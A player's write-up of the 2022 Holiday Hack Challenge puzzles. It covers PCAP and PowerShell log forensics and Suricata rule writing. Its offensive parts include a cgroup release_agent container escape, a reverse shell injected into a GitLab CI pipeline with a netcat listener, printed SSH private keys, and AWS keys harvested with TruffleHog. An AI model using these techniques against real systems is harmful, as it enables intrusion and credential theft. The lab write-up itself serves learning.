The Tolkien Ring

Wireshark puzzle

Use the Wireshark Phishing terminal in the Tolkien Ring to solve the mysteries around the suspicious PCAP. Get hints for this challenge by typing hint in the upper panel of the terminal.

1. There are objects in the PCAP file that can be exported by Wireshark and/or Tshark. What type of objects can be exported from this PCAP?
http

2. What is the file name of the largest file we can export?
app.php

3. What packet number starts that app.php file?
687

4. What is the IP of the Apache server? 
192.185.57.242

5. What file is saved to the infected host?
Ref_Sept24-2020.zip

6. Attackers used bad TLS certificates in this traffic. Which countries were they registered to? Submit the names of the countries in alphabetical order separated by a commas (Ex: Norway, South Korea).

Wireshark Filter: tls.handshake.type == 2 - inspect the certificate section of the packets and look at issuer -https://ask.wireshark.org/question/15113/filter-only-tlsv12-packets/
Israel, South Sudan, United States
IL, SS, US

7. Is the host infected (Yes/No)?
yes

Event logger

Investigate the Windows event log mystery in the terminal or offline. Get hints for this challenge by typing hint in the upper panel of the Windows Event Logs terminal.

Grinchum successfully downloaded his keylogger and has gathered the admin credentials! 
We think he used PowerShell to find the Lembanh recipe and steal our secret ingredient. 
Luckily, we enabled PowerShell auditing and have exported the Windows PowerShell logs to a flat text file. 
Please help me analyze this file and answer my questions.
Ready to begin? 
1. What month/day/year did the attack take place? For example, 09/05/2021.
We used cut and sort and uniq to see that most of the traffic took place on 12/24/2022

elf@2f0e2d66efaf:~$ grep -P -i -w "\d{2}/\d{2}/\d{4}" powershell.evtx.log |cut -f1 -d " "|cut -f2 -d$'\t'|uniq -c|sort
      1 ParameterBinding(Out-Default):
     34 10/31/2022
     36 11/25/2022
     36 12/18/2022
     46 10/13/2022
    240 11/11/2022
   1422 11/19/2022
   2088 12/13/2022
   2811 12/22/2022
   3540 12/24/2022
elf@2f0e2d66efaf:~$ 

2. An attacker got a secret from a file. What was the original file's name?
elf@72cff716d8ed:~$ cat powershell.evtx.log |grep -Fn "Add-Content"
recipe_updated.txt
───────────────────────────────────────────────────────────────────────────────────────────────
ParameterBinding(Add-Content): name=""Value""; value=""Preheat oven to 425F. Mix the flour, baking powder and salt into a large bowl. Add the butter and mix with a well till fine granules (easiest way is with an electric mixer). Then add the sugar and cinnamon, and mix them thoroughly.""
ParameterBinding(Add-Content): name=""Value""; value=""Finally add the cream, fish oil, and vanilla and stir them in with a fork until a nice, thick dough forms.""
ParameterBinding(Add-Content): name=""Value""; value=""Roll the dough out about 1/2 in thickness. Cut out 3-inch squares and transfer the dough to a cookie sheet.Criss-cross each square from corner-to-corner with a knife, lightly (not cutting through the dough).""
ParameterBinding(Add-Content): name=""Value""; value=""Bake for about 12 minutes or more (depending on the thickness of the bread) until it is set and lightly golden.""
ParameterBinding(Add-Content): name=""Value""; value=""Let cool completely before eating, this bread tastes better room temperature and dry. Also for more flavor you can add more cinnamon or other spices""
        Command Name = Add-Content
$foo | Add-Content -Path 'recipe_updated.txt'
CommandInvocation(Add-Content): ""Add-Content""
ParameterBinding(Add-Content): name=""Path""; value=""recipe_updated.txt""
ParameterBinding(Add-Content): name=""Value""; value=""""
$foo = Get-Content .\Recipe| % {$_-replace 'honey','fish oil'} $foo | Add-Content -Path 'recipe_updated.txt'
CommandInvocation(Add-Content): ""Add-Content""
ParameterBinding(Add-Content): name=""Path""; value=""recipe_updated.txt""
ParameterBinding(Add-Content): name=""Value""; value=""""
$foo = Get-Content .\Recipe| % {$_ -replace 'honey', 'fish oil'} $foo | Add-Content -Path 'recipe_updated.txt'
elf@2f0e2d66efaf:~$ 

3. The contents of the previous file were retrieved, changed, and stored to a variable by the attacker. This was done multiple times. Submit the last full PowerShell line that performed only these actions.
$foo = Get-Content .\Recipe| % {$_ -replace 'honey', 'fish oil'} $foo | Add-Content -Path 'recipe_updated.txt'


4. After storing the altered file contents into the variable, the attacker used the variable to run a separate command that wrote the modified data to a file. This was done multiple times. Submit the last full PowerShell line that performed only this action.
elf@72cff716d8ed:~$ tac powershell.evtx.log |grep -Fn "$"
: $foo | Add-Content -Path 'Recipe'

───────────────────────────────────────────────────────────────────────────────────────────────
36664:ParameterBinding(ForEach-Object): name=""Process""; value=""$_-replace 'honey','fish oil'""
36904:$foo = Get-Content .\Recipe| % {$_-replace 'honey','fish oil'}
36911:{$_-replace 'honey','fish oil'}
37022:ParameterBinding(ForEach-Object): name=""Process""; value=""$_-replace 'honey','fish oil'""
37128:$foo | Add-Content -Path 'recipe_updated.txt'
37581:$foo | Add-Content -Path 'Recipe.txt'
37879:$foo = Get-Content .\Recipe| % {$_-replace 'honey','fish oil'}
37886:{$_-replace 'honey','fish oil'}
37997:ParameterBinding(ForEach-Object): name=""Process""; value=""$_-replace 'honey','fish oil'""
38103:$foo | Add-Content -Path 'Recipe.txt'
38401:$foo = Get-Content .\Recipe| % {$_ -replace 'honey', 'fish oil'}
38408:{$_ -replace 'honey', 'fish oil'}
38519:ParameterBinding(ForEach-Object): name=""Process""; value=""$_ -replace 'honey', 'fish oil'""
38625:$foo | Add-Content -Path 'Recipe.txt'
38936:$foo | Add-Content -Path 'Recipe'
40158:$global:?
41368:{ Set-StrictMode -Version 1; $_.PSMessageDetails }
41437:{ Set-StrictMode -Version 1; $_.ErrorCategory_Message }
41472:{ Set-StrictMode -Version 1; $_.OriginInfo }
41745:{ Set-StrictMode -Version 1; $_.PSMessageDetails }
41814:{ Set-StrictMode -Version 1; $_.ErrorCategory_Message }
41849:{ Set-StrictMode -Version 1; $_.OriginInfo }

5. The attacker ran the previous command against a file multiple times. What is the name of this file?
: Recipe.txt


6. Were any files deleted? (Yes/No)
: Yes

7. Was the original file deleted? (Yes/No)
No.
It was replaced see above

8. What is the Event ID of the log that shows the actual command line used to delete the file?
: 4104

^M
User Data:^M
^M
"^M
Verbose 12/24/2022 3:05:42 AM   Microsoft-Windows-PowerShell    4105    Starting Command        "Started invocation of ScriptBlock ID: b0d4f117-b6d4-449b-a179-2c59d6b4f548^M
Runspace ID: 4181eda9-20e6-4eb9-8869-fe5fa6d5e663"^M
Verbose 12/24/2022 3:05:42 AM   Microsoft-Windows-PowerShell    4104    Execute a Remote Command        "Creating Scriptblock text (1 of 1):^M
del .\Recipe.txt^M
^M
ScriptBlock ID: b0d4f117-b6d4-449b-a179-2c59d6b4f548^M
Path: "^M
Information     12/24/2022 3:05:42 AM   Microsoft-Windows-PowerShell    4103    Executing Pipeline      "CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""^M
                                                                             6761,1        14%

9. Is the secret ingredient compromised (Yes/No)?
: Yes

10. What is the secret ingredient?
$foo = Get-Content .\Recipe| % {$_ -replace 'honey', 'fish oil'} $foo | Add-Content -Path 'recipe_updated.txt'
honey

Suricata Regatta

Help detect this kind of malicious activity in the future by writing some Suricata rules. Work with Dusty Giftwrap in the Tolkien Ring to get some hints.

Use your investigative analysis skills and the suspicious.pcap file to help develop Suricata rules for the elves!

There's a short list of rules started in suricata.rules in your home directory.

First off, the STINC (Santa's Team of Intelligent Naughty Catchers) has a lead for us.
They have some Dridex indicators of compromise to check out.
First, please create a Suricata rule to catch DNS lookups for adv.epostoday.uk.
Whenever there's a match, the alert message (msg) should read Known bad DNS lookup, possible Dridex infection.
Add your rule to suricata.rules

Once you think you have it right, run ./rule_checker to see how you've done!
As you get rules correct, rule_checker will ask for more to be added.

If you want to start fresh, you can exit the terminal and start again or cp suricata.rules.backup suricata.rules

Good luck, and thanks for helping save the North Pole!

First, please create a Suricata rule to catch DNS lookups for adv.epostoday.uk. Whenever there’s a match, the alert message (msg) should read Known bad DNS lookup, possible Dridex infection.

dns any any -> any any (msg:"Known bad DNS lookup, possible Dridex infection."; dns.query; content:"dv.epostoday.uk"; nocase; sid:1;)

STINC thanks you for your work with that DNS record! In this PCAP, it points to 192.185.57.242. Develop a Suricata rule that alerts whenever the infected IP address 192.185.57.242 communicates with internal systems over HTTP.

alert http $HOME_NET any <> 192.185.57.242 any (msg:"Investigate suspicious connections, possible Dridex infection";  sid:2;)

We heard that some naughty actors are using TLS certificates with a specific CN. Develop a Suricata rule to match and alert on an SSL certificate for heardbellith.Icanwepeh.nagoya. When your rule matches, the message (msg) should read Investigate bad certificates, possible Dridex infection

alert tls $EXTERNAL_NET any <> $HOME_NET any (msg:"Investigate bad certificates, possible Dridex infection"; tls.cert_subject; content:"CN=heardbellith.Icanwepeh.nagoya"; sid:3;)

OK, one more to rule them all and in the darkness find them.Let’s watch for one line from the JavaScript: let byte Characters = atob. Oh, and that string might be GZip compressed - I hope that’s OK! Just in case they try this again, please alert on that HTTP data with message Suspicious JavaScript function, possible Dridex infection

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"Suspicious JavaScript function, possible Dridex infection"; http.response_body; content:"let byteCharacters = atob"; nocase; sid:4;)

Elfen Ring

Clone with a difference

Clone a code repository. Get hints for this challenge from Bow Ninecandle in the Elfen Ring.

We just need you to clone one repo: git clone git@haugfactory.com:asnowball/aws_scripts.git 
This should be easy, right?

Thing is: it doesn't seem to be working for me. This is a public repository though. I'm so confused!

Please clone the repo and cat the README.md file.
Then runtoanswer and tell us the last word of the README.md file!

You head over to https://haugfactory.com/orcadmin/aws_scripts and see that asnowball has been renamed to orcadmin... easy... 

This is how i solved the puzzle:

bow@e61e3321e018:~$ mkdir test
bow@e61e3321e018:~$ cd test/
bow@e61e3321e018:~/test$ git init .
bow@e61e3321e018:~/test$ git remote add origin http://haugfactory.com/orcadmin/aws_scripts.git
bow@e61e3321e018:~/test$ git pull origin main
bow@e61e3321e018:~/test$ ls -lah
total 140K
drwxr-xr-x 3 bow bow 4.0K Dec 10 17:53 .
drwxr-xr-x 1 bow bow 4.0K Dec 10 17:52 ..
drwxr-xr-x 8 bow bow 4.0K Dec 10 17:53 .git
-rw-r--r-- 1 bow bow 6.1K Dec 10 17:53 README.md
-rw-r--r-- 1 bow bow 6.2K Dec 10 17:53 analytics.py
-rw-r--r-- 1 bow bow  19K Dec 10 17:53 compute.py
-rw-r--r-- 1 bow bow 7.1K Dec 10 17:53 container.py
-rw-r--r-- 1 bow bow  259 Dec 10 17:53 create_instance.py
-rw-r--r-- 1 bow bow  528 Dec 10 17:53 debug_instances.py
-rwxr-xr-x 1 bow bow 6.0K Dec 10 17:53 ec2-instances.py
-rw-r--r-- 1 bow bow 1.7K Dec 10 17:53 iam.py
-rw-r--r-- 1 bow bow  22K Dec 10 17:53 inventory.py
-rw-r--r-- 1 bow bow 6.5K Dec 10 17:53 network.py
-rw-r--r-- 1 bow bow  551 Dec 10 17:53 put_policy.py
-rw-r--r-- 1 bow bow 5.1K Dec 10 17:53 sample.json
-rw-r--r-- 1 bow bow  11K Dec 10 17:53 security.py
-rw-r--r-- 1 bow bow  774 Dec 10 17:53 send_ssm.py
bow@e61e3321e018:~/test$ cat README.md

..<snip>..

## Project status
If you have run out of energy or time for your project, put a note at the top of the README saying that development has slowed down or stopped completely. Someone may choose to fork your project or volunteer to step in as a maintainer or owner, allowing your project to keep going. You can also make an explicit request for maintainers.

bow@e61e3321e018:~/test$ runtoanswer maintainers
Your answer: maintainers

Checking......
Your answer is correct!

Prison Escape

Escape from a container. Get hints for this challenge from Bow Ninecandle in the Elfen Ring. What hex string appears in the host file /home/jailer/.ssh/jail.key.priv?

######################################################

Thu Dec 15 01:18:44 UTC 2022

On attempt [5] of trying to connect.

If no connection is made after [60] attempts

contact the holidayhack sys admins via discord.

######################################################

Greetings Noble Player,

You find yourself in a jail with a recently captured Dwarven Elf.

He desperately asks your help in escaping for he is on a quest to aid a friend in a search for treasure inside a crypto-mine.

If you can help him break free of his containment, he claims you would receive "MUCH GLORY!"

Please, do your best to un-contain yourself and find the keys to both of your freedom.

Solution… I definitely used the hints on this one

grinchum-land:~$ sudo su
grinchum-land:/home/samways# mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp
 && mkdir /tmp/cgrp/x
grinchum-land:/home/samways# echo 1 > /tmp/cgrp/x/notify_on_release
grinchum-land:/home/samways# host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
grinchum-land:/home/samways# echo "$host_path/cmd" > /tmp/cgrp/release_agent
grinchum-land:/home/samways# echo '#!/bin/sh' > /cmd
grinchum-land:/home/samways# echo "cat /home/jailer/.ssh/jail.key.priv > $host_path/output" >> /cmd
grinchum-land:/home/samways# chmod a+x /cmd
grinchum-land:/home/samways# sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
grinchum-land:/home/samways# cat /output

                Congratulations! 

          You've found the secret for the 
          HHC22 container escape challenge!

                     .--._..--.
              ___   ( _'-_  -_.'
          _.-'   `-._|  - :- |
      _.-'           `--...__|
   .-'                       '--..___
  / `._                              \
   `. `._               one           |
     `. `._                           /
       '. `._    :__________....-----'
         `..`---'    |-_  _- |___...----..._
                     |_....--'             `.`.
               _...--'                       `.`.
          _..-'                             _.'.'
       .-'             step                _.'.'
       |                               _.'.'
       |                   __....------'-'
       |     __...------''' _|
       '--'''        |-  - _ |
               _.-''''''''''''''''''-._
            _.'                        |\
          .'                         _.' |
          `._          closer           |:.'
            `._                     _.' |
               `..__                 |  |
                    `---.._.--.    _|  |
                     | _   - | `-.._|_.'
          .--...__   |   -  _|
         .'_      `--.....__ |
        .'_                 `--..__
       .'_                         `.
      .'_    082bb339ec19de4935867   `-.
      `--..____                        _`.
               ```--...____          _..--'
                     | - _ ```---.._.'
                     |   - _ |
                     |_ -  - |
                     |   - _ |
                     | -_  -_|
                     |   - _ |
                     |   - _ |
                     | -_  -_|
grinchum-land:/home/samways# 

Jolly CI/CD

Exploit a CI/CD pipeline. Get hints for this challenge from Tinsel Upatree in the Elfen Ring.

######################################################
 
Greetings Noble Player, 

Many thanks for answering our desperate cry for help!

You may have heard that some evil Sporcs have opened up a web-store selling 
counterfeit banners and flags of the many noble houses found in the land of 
the North! They have leveraged some dastardly technology to power their 
storefront, and this technology is known as PHP! 

***gasp*** 

This strorefront utilizes a truly despicable amount of resources to keep the 
website up. And there is only a certain type of Christmas Magic capable of 
powering such a thing… an Elfen Ring!

Along with PHP there is something new we've not yet seen in our land. 
A technology called Continuous Integration and Continuous Deployment! 

Be wary! 

Many fair elves have suffered greatly but in doing so, they've managed to 
secure you a persistent connection on an internal network. 

BTW take excellent notes! 

Should you lose your connection or be discovered and evicted the 
elves can work to re-establish persistence. In fact, the sound off fans
and the sag in lighting tells me all the systems are booting up again right now.  

Please, for the sake of our Holiday help us recover the Ring and save Christmas!

So this one took awhile… but was probably my favorite… used the hint to the repo and was off to the races.

grinchum-land:~$ git clone http://gitlab.flag.net.internal/rings-of-powder/wordpress.flag.net.internal.git
grinchum-land:~/wordpress.flag.net.internal$ git checkout abdea0ebb21b156c01f7533cea3b895c26198c98
grinchum-land:~/wordpress.flag.net.internal$ mkdir ~/.ssh && cp -R .ssh/.deploy* ~/.ssh/
grinchum-land:~/wordpress.flag.net.internal$ eval "$(ssh-agent -s)"
grinchum-land:~/wordpress.flag.net.internal$ mv ~/.ssh/.deploy ~/.ssh/id_ed25519
grinchum-land:~/wordpress.flag.net.internal$ mv ~/.ssh/.deploy.pub ~/.ssh/id_ed25519.pub
grinchum-land:~/wordpress.flag.net.internal$chmod 600 ~/.ssh/id_*
grinchum-land:~/wordpress.flag.net.internal$ ssh-add ~/.ssh/.deploy
grinchum-land:~/ rm -rf wordpress.flag.net.internal/
grinchum-land:~/wordpress.flag.net.internal$ git clone git@gitlab.flag.net.internal:rings-of-powder/wordpress.flag.net.internal.git
grinchum-land:~/wordpress.flag.net.internal$ cat .gitlab-ci.yml 
stages:
  - deploy

deploy-job:      
  stage: deploy 
  environment: production
  before_script:
    - echo "Host *ntStrictHostKeyChecking no" >> ~/.ssh/config
    - eval $(ssh-agent -s)
    - echo "$SSH_PRIVATE_KEY" | ssh-add -
  script:
    - rsync --chown=www-data:www-data -atv --delete --progress ./ root@wordpress.flag.net.internal:/var/www/html

#add the reverse shell in the gitlab-ci.yml 
grinchum-land:~/wordpress.flag.net.internal$ vim .gitlab-ci.yml 
deploy-job:      
  stage: deploy 
  environment: production
  script:
    - rsync -e "ssh -i /etc/gitlab-runner/hhc22-wordpress-deploy" --chown=www-data:www-data -atv --delete --progress ./ root@wordpress.flag.net.internal:/var/www/html
    - bash -i >& /dev/tcp/172.18.0.99/4545 0>&1  

grinchum-land:~/wordpress.flag.net.internal$ git add .
grinchum-land:~/wordpress.flag.net.internal$ git commit -a -m "4545"
[main 691d5b7] 4545
 1 file changed, 1 insertion(+), 1 deletion(-)
grinchum-land:~/wordpress.flag.net.internal$ git push
^[[A^[[AEnumerating objects: 5, done.
Counting objects: 100% (5/5), done.
Delta compression using up to 2 threads
Compressing objects: 100% (3/3), done.
Writing objects: 100% (3/3), 288 bytes | 288.00 KiB/s, done.
Total 3 (delta 2), reused 0 (delta 0), pack-reused 0
To gitlab.flag.net.internal:rings-of-powder/wordpress.flag.net.internal.git
   6b23aa2..691d5b7  main -> main


# start the listener
grinchum-land:~/wordpress.flag.net.internal$ nc -lnvp 4545
Listening on [0.0.0.0] (family 0, port 4545)
Connection from 172.18.1.149 38002 received!
bash: cannot set terminal process group (501): Not a tty
bash: no job control in this shell


<ziL/0/rings-of-powder/wordpress.flag.net.internal# cat /etc/gitlab-runner/hhc22-wordpress-deploy.pub
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACD8EYdZTOpf5REuWXMb9FKCFWoiIX2HoU1aH90V0Ptq3wAAAJiMXr0BjF69
AQAAAAtzc2gtZWQyNTUxOQAAACD8EYdZTOpf5REuWXMb9FKCFWoiIX2HoU1aH90V0Ptq3w
AAAEBtNE6sqOFoqkmOhcB/9DgzaQhQRC/bwkAbsBXwqrt/mPwRh1lM6l/lES5Zcxv0UoIV
aiIhfYehTVof3RXQ+2rfAAAAFHNwb3J4QGtyaW5nbGVjb24uY29tAQ==
-----END OPENSSH PRIVATE KEY-----
<ziL/0/rings-of-powder/wordpress.flag.net.internal# ssh -i /etc/gitlab-runner/hhc22-wordpress-deploy root@wordpress.flag.net.internal -t "bash --noprofile"
<t@wordpress.flag.net.internal -t "bash --noprofile"
cat /flag.txt

                           Congratulations! You've found the HHC2022 Elfen Ring!


                                        ░░░░            ░░░░                                      
                                ░░                              ░░░░                              
                            ░░                                      ░░░░                          
                                                                        ░░                        
                      ░░                                                  ░░░░                    
                                                                              ░░                  
                                      ░░░░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒░░░░                  ░░                
                                  ░░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒▒░░                ░░              
                              ░░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒▒                ░░            
                          ░░▒▒▒▒▓▓▓▓▓▓▓▓▓▓░░              ▓▓▓▓▓▓▓▓▒▒░░░░            ░░░░          
          ░░            ░░▒▒▓▓▓▓▓▓▓▓                            ▓▓▓▓▓▓▒▒░░            ░░░░        
                      ░░▒▒▓▓▓▓▓▓                                    ▓▓▒▒▒▒░░          ░░░░        
                      ▒▒▓▓▓▓▓▓                                        ▓▓▓▓▒▒░░          ░░░░      
      ░░            ▒▒▓▓▓▓▓▓                                            ▓▓▒▒░░░░        ░░░░▒▒    
                  ░░▒▒▓▓▓▓░░                                            ░░▒▒▒▒░░░░      ░░░░▒▒    
                  ░░▓▓▓▓▓▓                                                ▓▓▒▒░░░░      ░░░░▒▒    
    ░░            ▒▒▓▓▓▓                                                    ▒▒░░░░        ░░▒▒▒▒  
    ░░          ░░▓▓▓▓▓▓                                                    ▒▒▒▒░░░░      ░░▒▒▒▒  
    ░░          ▒▒▓▓▓▓                                                        ▒▒░░░░      ░░▒▒▒▒  
                ▒▒▓▓▓▓                                                        ▒▒░░░░░░    ░░▒▒▒▒  
  ░░          ░░▓▓▓▓▒▒                                                        ▒▒░░░░░░    ░░▒▒▒▒▓▓
  ░░          ▒▒▓▓▓▓                                                            ░░░░░░░░  ░░▒▒▒▒▓▓
  ░░          ▒▒▓▓▓▓                                                            ░░░░░░░░  ░░▒▒▒▒▓▓
  ░░          ▒▒▓▓▓▓               oI40zIuCcN8c3MhKgQjOMN8lfYtVqcKT             ░░░░░░░░  ░░▒▒▒▒▓▓
  ░░░░        ▒▒▓▓▓▓                                                            ░░░░  ░░░░░░▒▒▒▒▓▓
  ░░░░        ▒▒▓▓▓▓                                                            ░░    ░░░░▒▒▒▒▒▒▓▓
  ▒▒░░        ▒▒▓▓▓▓                                                            ░░    ░░░░▒▒▒▒▒▒▓▓
  ▒▒░░░░      ▒▒▓▓▓▓                                                            ░░    ░░░░▒▒▒▒▒▒▓▓
  ▓▓░░░░      ░░▓▓▓▓▒▒                                                        ░░      ░░░░▒▒▒▒▓▓▓▓
    ▒▒░░        ▒▒▓▓▓▓                                                        ░░    ░░░░▒▒▒▒▒▒▓▓  
    ▒▒░░░░      ░░▓▓▓▓                                                        ░░    ░░░░▒▒▒▒▓▓▓▓  
    ▓▓▒▒░░      ░░▒▒▓▓▓▓                                                    ░░      ░░▒▒▒▒▒▒▓▓▓▓  
    ▓▓▒▒░░░░      ▒▒▒▒▓▓                                                          ░░░░▒▒▒▒▒▒▓▓▓▓  
      ▒▒▒▒░░░░    ▒▒▒▒▒▒▒▒                                                        ░░▒▒▒▒▒▒▒▒▓▓    
      ▓▓▒▒░░░░    ░░░░▒▒▒▒▓▓                                            ░░      ░░░░▒▒▒▒▒▒▓▓▓▓    
        ▒▒▒▒░░░░    ░░▒▒▒▒▒▒▒▒                                        ░░      ░░░░▒▒▒▒▒▒▒▒▓▓      
          ▓▓▒▒░░░░  ░░░░░░░░▒▒▓▓                                    ░░      ░░░░▒▒▒▒▒▒▓▓▓▓        
          ▓▓▓▓▒▒░░░░░░░░░░░░░░▒▒▒▒▓▓                            ░░        ░░░░▒▒▒▒▒▒▓▓▓▓▓▓        
            ▓▓▓▓▒▒░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▒                ░░░░          ░░░░▒▒▒▒▒▒▓▓▓▓▓▓          
              ▓▓▓▓▒▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░                ░░░░▒▒▒▒▒▒▓▓▓▓▓▓            
                ▓▓▒▒▒▒▒▒░░░░░░░░░░░░░░░░░░                        ░░░░▒▒▒▒▒▒▒▒▒▒▓▓▓▓              
                  ▓▓▓▓▓▓▒▒▒▒░░░░░░░░░░░░░░░░              ░░░░░░░░▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓                
                    ▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒▒░░░░░░░░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓                  
                      ██▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓██                    
                          ██▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██                        
                            ████▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████                          
                                ████████▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████                              
                                ░░░░░░░░▓▓██████████████████░░░░░░░░                              


Cloud Ring

AWS CLI Intro

Try out some basic AWS command line skills in this terminal. Talk to Jill Underpole in the Cloud Ring for hints.

Great! When you're done, you can quit with q.
Next, please configure the default aws cli credentials with the access key AKQAAYRKO7A5Q5XUY2IY, the secret key qzTscgNdcdwIo/soPKPoJn9sBrl5eMQQL19iO5uf and the region us-east-1 .
https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-quickstart.html#cli-configure-quickstart-config

───────────────────────────────────────────────────────────────────────────────────────────────
elf@2c99e7222027:~$ aws configure
WS Access Key ID [None]: AKQAAYRKO7A5Q5XUY2IY
elf@2c99e7222027:~$ aws sts get-caller-identity
{
    "UserId": "AKQAAYRKO7A5Q5XUY2IY",
    "Account": "602143214321",
    "Arn": "arn:aws:iam::602143214321:user/elf_helpdesk"
}
elf@2c99e7222027:~$ 

TruffleHog

Use Trufflehog to find secrets in a Git repo. Work with Jill Underpole in the Cloud Ring for hints. What’s the name of the file that has AWS credentials?

  1. Use Trufflehog to find credentials in the Gitlab instance at https://haugfactory.com/asnowball/aws_scripts.git. Configure these credentials for us-east-1 and then run: $ aws sts get-caller-identity
elf@dd1ea5c9dd6e:~/test$ trufflehog git https://haugfactory.com/asnowball/aws_scripts.git
🐷🔑🐷  TruffleHog. Unearth your secrets. 🐷🔑🐷

Found unverified result 🐷🔑❓
Detector Type: AWS
Decoder Type: PLAIN
Raw result: AKIAAIDAYRANYAHGQOHD
Timestamp: 2022-09-07 07:53:12 -0700 -0700
Line: 6
Commit: 106d33e1ffd53eea753c1365eafc6588398279b5
File: put_policy.py
Email: asnowball <alabaster@northpolechristmastown.local>
Repository: https://haugfactory.com/asnowball/aws_scripts.git

^C2022/12/12 05:51:46 [updater parent] prog returned error: signal: interrupt
elf@dd1ea5c9dd6e:~/test$ 

https://haugfactory.com/orcadmin/aws_scripts/-/blob/106d33e1ffd53eea753c1365eafc6588398279b5/put_policy.py

iam = boto3.client('iam',
    region_name='us-east-1',
    aws_access_key_id="AKIAAIDAYRANYAHGQOHD",
    aws_secret_access_key="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",
)

elf@dd1ea5c9dd6e:~/test$ aws configure
AWS Access Key ID [None]: AKIAAIDAYRANYAHGQOHD
AWS Secret Access Key [None]: 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
Default region name [None]: us-east-1
Default output format [None]: aws sts get-caller-identity
elf@dd1ea5c9dd6e:~/test$ aws configure
AWS Access Key ID [****************QOHD]: 
AWS Secret Access Key [****************c1rL]: 
Default region name [us-east-1]: 
Default output format [aws sts get-caller-identity]: None
elf@dd1ea5c9dd6e:~/test$ aws sts get-caller-identity
{
    "UserId": "AIDAJNIAAQYHIAAHDDRA",
    "Account": "602123424321",
    "Arn": "arn:aws:iam::602123424321:user/haug"
}
elf@dd1ea5c9dd6e:~/test$ 
  1. Managed (think: shared) policies can be attached to multiple users. Use the AWS CLI to find any policies attached to your user. The aws iam command to list attached user policies can be found here: https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/index.html Hint: it is NOT list-user-policies.
elf@dd1ea5c9dd6e:~/test$ aws iam list-attached-user-policies --user-name haug
{
    "AttachedPolicies": [
        {
            "PolicyName": "TIER1_READONLY_POLICY",
            "PolicyArn": "arn:aws:iam::602123424321:policy/TIER1_READONLY_POLICY"
        }
    ],
    "IsTruncated": false
}
  1. Now, view or get the policy that is attached to your user. The aws iam command to get a policy can be found here: https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/index.html
elf@dd1ea5c9dd6e:~/test$ aws iam get-policy --policy-arn arn:aws:iam::602123424321:policy/TIER1_READONLY_POLICY
{
    "Policy": {
        "PolicyName": "TIER1_READONLY_POLICY",
        "PolicyId": "ANPAYYOROBUERT7TGKUHA",
        "Arn": "arn:aws:iam::602123424321:policy/TIER1_READONLY_POLICY",
        "Path": "/",
        "DefaultVersionId": "v1",
        "AttachmentCount": 11,
        "PermissionsBoundaryUsageCount": 0,
        "IsAttachable": true,
        "Description": "Policy for tier 1 accounts to have limited read only access to certain resources in IAM, S3, and LAMBDA.",
        "CreateDate": "2022-06-21 22:02:30+00:00",
        "UpdateDate": "2022-06-21 22:10:29+00:00",
        "Tags": []
    }
}
  1. Attached policies can have multiple versions. View the default version of this policy. The aws iam command to get a policy version can be found here: https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/index.html
elf@dd1ea5c9dd6e:~/test$ aws iam get-policy-version --version-id v1 --policy-arn arn:aws:iam::602123424321:policy/TIER1_READONLY_POLICY

───────────────────────────────────────────────────────────────────────────────────────────────
                        "iam:ListUserPolicies",
                        "iam:ListAttachedUserPolicies"
                    ],
                    "Resource": "arn:aws:iam::602123424321:user/${aws:username}"
                },
                {
                    "Effect": "Allow",
                    "Action": [
                        "iam:GetPolicy",
                        "iam:GetPolicyVersion"
                    ],
                    "Resource": "arn:aws:iam::602123424321:policy/TIER1_READONLY_POLICY"
                },
                {
                    "Effect": "Deny",
                    "Principal": "*",
                    "Action": [
                        "s3:GetObject",
                        "lambda:Invoke*"
                    ],
                    "Resource": "*"
                }
            ]
        },
        "VersionId": "v1",
        "IsDefaultVersion": false,
        "CreateDate": "2022-06-21 22:02:30+00:00"
    }
}
elf@dd1ea5c9dd6e:~/test$ 
  1. Inline policies are policies that are unique to a particular identity or resource. Use the AWS CLI to list the inline policies associated with your user. The aws iam command to list user policies can be found here: https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/index.html Hint: it is NOT list-attached-user-policies.
elf@dd1ea5c9dd6e:~/test$ aws iam list-user-policies --user-name haug
{
    "PolicyNames": [
        "S3Perms"
    ],
    "IsTruncated": false
}
elf@dd1ea5c9dd6e:~/test$ 
  1. Now, use the AWS CLI to get the only inline policy for your user. The aws iam command to get a user policy can be found here: https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/index.html
elf@dd1ea5c9dd6e:~/test$ aws iam get-user-policy --user-name haug --policy-name S3Perms 
    "UserPolicy": {
        "UserName": "haug",
        "PolicyName": "S3Perms",
        "PolicyDocument": {
            "Version": "2012-10-17",
            "Statement": [
                {
                    "Effect": "Allow",
                    "Action": [
                        "s3:ListObjects"
                    ],
                    "Resource": [
                        "arn:aws:s3:::smogmachines3",
                        "arn:aws:s3:::smogmachines3/*"
